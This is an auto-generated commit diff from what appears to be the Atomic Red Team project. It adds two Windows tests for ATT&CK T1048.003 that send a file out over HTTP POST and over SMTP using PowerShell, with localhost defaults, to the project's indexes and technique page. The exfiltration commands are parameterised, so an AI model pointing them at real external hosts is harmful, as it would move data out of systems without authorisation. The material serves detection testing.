Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -785,6 +785,8 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Al
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
 initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -550,6 +550,8 @@ execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,
 execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
 lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
 lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -1478,6 +1478,8 @@
   - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
   - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
   - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
+  - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
+  - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1023,6 +1023,8 @@
 - T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
   - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
+  - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
+  - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/index.yaml

@@ -60763,6 +60763,57 @@ exfiltration:
           output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1
           | sort | uniq | xxd -p -r\n"
         name: manual
+    - name: Exfiltration Over Alternative Protocol - HTTP
+      auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c
+      description: |
+        Exfiltration of specified file over HTTP.
+        Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $content = Get-Content #{input_file}
+          Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
+        name: powershell
+      input_arguments:
+        input_file:
+          description: Path to file to exfiltrate
+          type: Path
+          default: C:\Windows\System32\notepad.exe
+        ip_address:
+          description: Destination IP address where the data should be sent
+          type: String
+          default: http://127.0.0.1
+    - name: Exfiltration Over Alternative Protocol - SMTP
+      auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
+      description: |
+        Exfiltration of specified file over SMTP.
+        Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003
+          Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
+
+'
+        name: powershell
+      input_arguments:
+        input_file:
+          description: Path to file to exfiltrate
+          type: Path
+          default: C:\Windows\System32\notepad.exe
+        sender:
+          description: The email address of the sender
+          type: String
+          default: test@corp.com
+        receiver:
+          description: The email address of the receiver
+          type: String
+          default: test@corp.com
+        smtp_server:
+          description: SMTP server to use for email transportation
+          type: String
+          default: 127.0.0.1
   T1567:
     technique:
       external_references:

atomics/T1048.003/T1048.003.md

@@ -12,6 +12,10 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
 
 - [Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-3---exfiltration-over-alternative-protocol---dns)
 
+- [Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP](#atomic-test-4---exfiltration-over-alternative-protocol---http)
+
+- [Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP](#atomic-test-5---exfiltration-over-alternative-protocol---smtp)
+
 
 <br/>
 
@@ -108,4 +112,69 @@ Exfiltration of specified file over DNS protocol.
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP
+Exfiltration of specified file over HTTP.
+Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Path to file to exfiltrate | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
+| ip_address | Destination IP address where the data should be sent | String | http://127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$content = Get-Content #{input_file}
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
+Exfiltration of specified file over SMTP.
+Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Path to file to exfiltrate | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
+| sender | The email address of the sender | String | test@corp.com|
+| receiver | The email address of the receiver | String | test@corp.com|
+| smtp_server | SMTP server to use for email transportation | String | 127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
+```
+
+
+
+
+
+
 <br/>